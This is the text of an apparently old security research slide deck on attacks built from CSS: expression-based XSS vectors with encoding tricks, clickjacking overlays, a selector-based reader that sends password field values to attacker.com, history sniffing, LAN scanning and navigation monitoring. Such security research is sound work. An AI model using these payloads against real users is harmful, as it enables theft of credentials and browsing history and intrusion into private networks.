Post on 29-Nov-2014
The Sexy Assassin
Tactical Exploitation using CSS
CSS Presentation Overview
Old Attacks
New Research
New Attacks
Old Attacks - reloaded
Known attacks using CSS
XSS using CSS - Impact
Session riding/hijacking attack Steal page data content
Exploit BoF/HoF/Memory Corruption/etc. vulnerabilities
All other XSS threads
Expression XSS
CSS values can be escaped with backslashes <div style=xss:e\xp\re\s\s\i\o\n(alert(1))></div>Then further encoded with hex/decimal entities<div style=xss:e\xp\re\s\s\i\o\n(alert(1))></div> Following the CSS specification you can encode expressions with hex escapes<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div>
Expression XSS continued
We can also entity encode the previous vector<divstyle=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div>
External style sheet tricks
• Expressions can be executed in external style sheets• We can encode the vector• We can also encode the content
Importing expressions from a XSS file <style>@\69\6d\70\6f\72\74 'xss.css';</style>
How can we encode the content of a style sheet?<style>@import 'utf.css';</style>
UTF-7 Expression
UTF-7 encoded style sheet
@charset "UTF-7";+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-
Which produces:
* {xss:expression(alert(1))}
CSS Overlays (clickjacking)
CSS Overlays (clickjacking) Definition:
Convincing the user to click something, and use that click to do something else (bad things)
Click here to continue
Attacker page
CSS Overlays description
Original WebPage (iframe)
Button
____________________________________________________________________________________________________
_______________ _____________________________ _____________________________ ______________
CSS Overlays advanced attacks
• Multiple iframes nested
• Using offsets to gather a piece of a target site
• No opacity, filled white div regions
• Single sign on services vulnerable
• Combined Javascript and CSS tricks to intercept a click, impossible to know until it's too late
CSS Overlays advanced attacksVerisign case studyiframe performs a login request on site (ficlets.com)
<form action="http://ficlets.com/signin/openid.signin" method="post" id="openidform" target="iframe"><input type="hidden" name="openid" id="openidurl" class="textfield" value="openidtester.pip.verisignlabs.com" /> </form>
ficlets.com connects to Verisign provider
CSS Overlays advanced attacksVerisign case study cont.OpenID provider (Verisign) is now in our iframe
CSS Overlays advanced attacksVerisign case study cont.Using multiple iframes and div offsets we can cover the other areas with solid colours and position the target area wherever we like
CSS Overlays advanced attacksVerisign case study cont.• Opacity can be used but solid fills make the attack harder to
protect against at the browser level• Referer checking can neuter attack but not always available and no
implemented on most sites• Referer can be faked• David Ross idea to use a "clickjacket", accessible style sheet
which uses expressions to display a hover popup which appears above other elements.
CSS Overlays Work Arrounds
Someone -> iframe-breaker In some browsers (IE) JS can be disabled (iframe-
breaker-breaker)
NoScript -> Opacity disabled on remote iframes and embed content. CSS overlays that don't require Opacity still work.
Michal Zalewski -> click if not obstructed Still works against some no-opacity overlays attacks.
Mozilla -> Delayed disabled-buttons.Still exploitable
David Ross -> X-I-Don't-Wanna-Be-Iframed-Please Old browsers and websites still vulnerable.
Exploiting clickjacking defenses
• iframe hover state can be intercepted• No way to tell if you're hovering over an external site• Clicks can then be transferred to the iframe when a user clicks
<html><head></head><body><image ISMAP style="position:absolute;width:100%;height:100%;" onmousedown="this.style.display='none'"><iframe src="http://www.microsoft.com" id=x type=text/html width=500 height=500 codetype=text/html id=x></iframe></image></button></body></html>
Exploiting clickjacking defenses
• Image intercepts the hover state• Image is hidden onmousedown• The click is transferred to the iframe because the mousedown state
is used, onmouseup we're in the iframe
More clickjacking defenses
• My extension to David Ross' click jacket• Full metal click jacket• CSS accessible style sheet is used to override browser defaults
with !important. iframe,frame,object,applet { border:1px solid #000 !important; visibility:visible !important; opacity: 1 !important; filter: alpha(opacity=100) !important; position:absolute !important; float:none !important; overflow:auto !important; .... }
More clickjacking defenses
Advantages:• Object styles are locked• User can see clearly that it is a external site• Javascript and CSS modification of styles have no effect
Disadvantages:• Manuel Caballero hacked it :)• Parent element allows opacity modification
More clickjacking defenses
Browser level CSS locks could prevent attacks
Advantages:• Hard for attacker to exploit if external objects are clearly visible
and above everything else Disadvantages:• Designers would complain about limiting design ideas• External objects would look ugly• Could break existing sites
New Research
Algorithms
Arithmetics & Memory- Check out Demos on http://p42.us/css
How:element:condition{
action;}
element: anythingcondition: :visited, :active, :hover, :selected, etc..action: background(remote request), display, opacity, visibility.
Loops- Check out Demos on http://p42.us/css
Recalc of style:
- META refreshes <meta http-equiv=“refresh” content=“0;URL=#1”>
- -moz-binding *{-moz-binding:url(“remote-req#id”)}
- webkit proposed CSS based animations (not very useful) @keyframes{}
Server Side Interaction- Check out Demos on http://p42.us/css
Use HTML+XML data loading (just IE or just FFx)MSIE HTC files, XML DATAFLDmoz-binding
Metarefreshes + Stylesheet update (it’s not cross-browser) <meta http-equiv=“refresh” content=“0”>Async stylesheet loading (doesn’t work on strict mode)
<element><style>@import”//url1”;</style><style>@import”//url2”;</style>
Multiple iframe loading (works everywere)<iframe src=“site.com/”></iframe><iframe src=“site.com//”></iframe>
New attacks
Attacks possible thanks to the "theory"
CSS HTML Attribute Reader
CSS HTML Attribute Reader How to read HTML Attributes using CSS, without javascript.
CSS HTML Attribute Reader
Advanced CSS3 Attribute Selectors:
For matching:<input type=“password” value=“savedpassword”/>
• input{}– Matches all inputs.
• input[type]{}– Matches all inputs with an attribute “type”.
• input[type=“password”]{}– Matches all inputs of type “password”.
CSS HTML Attribute Reader
Advanced CSS3 Attribute Selectors:
For matching:<input type=“password” value=“savedpassword”/>
• input[type*=“swor”]{}– Matches all input elements whose type attribute contains “swor” (anywhere)
• input[type^=“pass”]{}– Matches all inputs whose type attribute starts with “pass”
• input[type$=“word”]{}– Matches all inputs whose type attribute ends with “word”
CSS HTML Attribute Reader
Attempts to read an attribute with [=] selector with help of the [*=] selector!Calculate the range of the chars in the value.
input[value*=“\x10”]{ background:url(“//attacker.com/?h=\x10”);}…
111 different variations…input[value*=“\x7F”]{ background:url(“//attacker.com/?h=\x7F”);}
To calculate the first letter if we asume from the previews step that the range is [uiopasdf]
input[value^=“u”]{ background:url(“//attacker.com/?s=u”);}…
and so, 8 questions... u,i,o,p,a,s,d,f …input[value^=“f”]{ background:url(“//attacker.com/?s=f”);}
CSS HTML Attribute Reader – Try 3
Once we found the first char (let’s say it was d) we continue with [uiopasf] :
input[value^=“du”]{ background:url(“//attacker.com/?s=du”);}…
and so, 7 questions... u,i,o,p,a,s, ,f …input[value^=“df”]{ background:url(“//attacker.com/?s=df”);}
CSS HTML Attribute Reader – Try 3
And so on. If we assume known attribute length, but allow for repeats…
111+N^2 CSS rules
In the worst case for 8 chars: 175 CSS rules
In the worst case for 50 chars: 2,611 CSS rules
CSS HTML Attribute Reader – Try 3
CSS HTML Attribute Reader
We can optimize this more, but at an implementation level.
First, we can use [^=] and [$=] selectors at the same time halving the number of requests.
CSS HTML Attribute Reader
Detect the rangeDetect first charand eigthth char
Detect second charand seventh char
Detect third charand sixth char
Detect fourth charand fifth char
Confirm we havethe correct string
1 2 3
4 5 6
CSS HTML Attribute Reader
Demo:- Async stylesheet load attribute reader (read the contents of a text field without js)
http://eaea.sirdarckcat.net/cssar/
Parallel discovery by Stefano Di Paola (WiSec) with 111*N complexity (888 rules for 8 chars)
http://www.wisec.it/
-1day (0Day-1) - Cross Site Styling
HTML5 Describes seamless iframes. So HTML Attribute reading would be a vulnerability in a non-implemented standard! These will inherit all styles of the parent document (cross origin). CSS will read content cross-origin! Call for Microsoft's guys in the W3C HTML5 WG: Stop this! make it same-origin only ;)
<style>@import”exploit”;</style><iframe src=“victim” seamless=“seamless”/>
CSS History Hacks
CSS History Hacks Attacks based on the possibility of CSS of reading a browser's History.
Visited boolean
Cross-browser <style> a:visited{background:url(//visited)} a:not(:visited){background:url(//not-visited)}</style><a href="http://website/"> </a>
Impact Privacy
Counter-measuresFirefox: SafeHistory addonIE: Disable history
Demo: http://ha.ckers.org/weird/CSS-history.cgi
CSS LAN Scanner
PoC: CSS LAN Scanner
How it works: Error pages don't create a log in the history. If a website is valid, then it is marked as visited. The scanner just visits a lot of LAN IPs, and checks if they were marked as visited.
CSS LAN Scanner
LAN intranet
attacker.com
victim
10.3.22.111Private webservice
192.168.1.254Configuration
router
Victim visits attacker.com.
CSS LAN Scanner
LAN intranet
attacker.com
victim
10.3.22.111Private webservice
192.168.1.254Configuration
router
attacker.com tries to open a lot of local ip addresses on iframes, most will fail.
CSS LAN Scanner
LAN intranet
attacker.com
victim
10.3.22.111Private webservice
192.168.1.254Configuration
router
attacker.com then asks which websites appear as visited, and so, those IPs are up.
CSS LAN Scanner
LAN intranet
attacker.com
victim
10.3.22.111Private webservice
192.168.1.254Configuration
router
The victim responds attacker with the visited IPs.
CSS LAN Scanner
LAN intranet
attacker.com
victim
10.3.22.111Private webservice
192.168.1.254Configuration
router
attacker.com then tries to guess the service on those IPs based on ports, and if necessary, the content of remote Stylesheets
CSS LAN Scanner
LAN intranet
attacker.com
victim
10.3.22.111Private webservice
192.168.1.254Configuration
router
attacker.com then sends CSRF attacks against the detected software behind the LANs.
CSSH - CSS Stealing Some History
CSSH - CSS Stealing Some History
History Crawler + Navigation Monitoring!
CSSH - History Crawler
attacker.com
digg.com
twitter.com
slashdot.org
hi5.com
myspace
google news
msn.com
del.icio.us
live.com
sla.ckers.org
Redtube
attacker.com shows a lot of possible websites that the user may have visited.
Victim
CSSH - History Crawler
attacker.com
digg.com
twitter.com
slashdot.org
hi5.com
myspace
google news
msn.com
del.icio.us
live.com
sla.ckers.org
Redtube
The victim responds the attacker with the websites visited.
Victim
CSSH - History Crawler
attacker.com
Link #1
Link #2
Link #3
Link #4
Link #5
Link #6
Attacker fetches the links of those websites, and asks which ones are visited.
The victim responds, and the exploit asks again endlessly.
Victim
CSSH - History Crawler
This way we can effectivelly crawl commonly visited websites of a user.
The privacy implications of this are huge.
This attack is not a secret, it was described in Mozilla’s bugtrack by Paul Stone:
https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c78
CSSH - Navigation Monitoring
What if...
We could detect in real-time the navigation of a user using our history crawler?
Might this be possible?
Yes
CSSH - Navigation Monitoring
Victim
Attacker
Victim visits attacker.com
CSSH - Navigation Monitoring
Victim
Attacker
digg.com
attacker.com sends exploit to user, and opens digg.com.
CSSH - Navigation Monitoring
Victim
Attacker
The exploit detects that digg.com was visited, so it alerts attacker.com, and attacker.com fetches the links on digg.com.
digg.com
CSSH - Navigation Monitoring
Victim
Attacker
Then, the attacker updates the exploit, and start asking for each link if anyone of them are visited.
digg.com
CSSH - Navigation Monitoring
Victim
Attacker
When the user finally clicks on a link, the exploit detects it, and alert’s attacker.com
digg.com cnn.com
CSSH - Navigation Monitoring
Victim
Attacker
attacker.com fetches all links on cnn.com, and updates the exploit asking wether they where visited.
digg.com cnn.com
CSSH - Navigation Monitoring
Victim
Attacker
Repeat above steps indefinitely.
digg.com cnn.com
CSSH - Navigation Monitoring
Public Demo :http://eaea.sirdarckcat.net/cssh-mon/
Cross-browser.
Thanks
We would like to thank:Bluehat team, David Ross, Robert Hansen, Jeremiah Grossman, Giorgio Maone, Alex K, David Lenoe (Adobe PSIRT), Google Sec. Team, Stefano DiPaola, and everyone else that asisted in any way our research.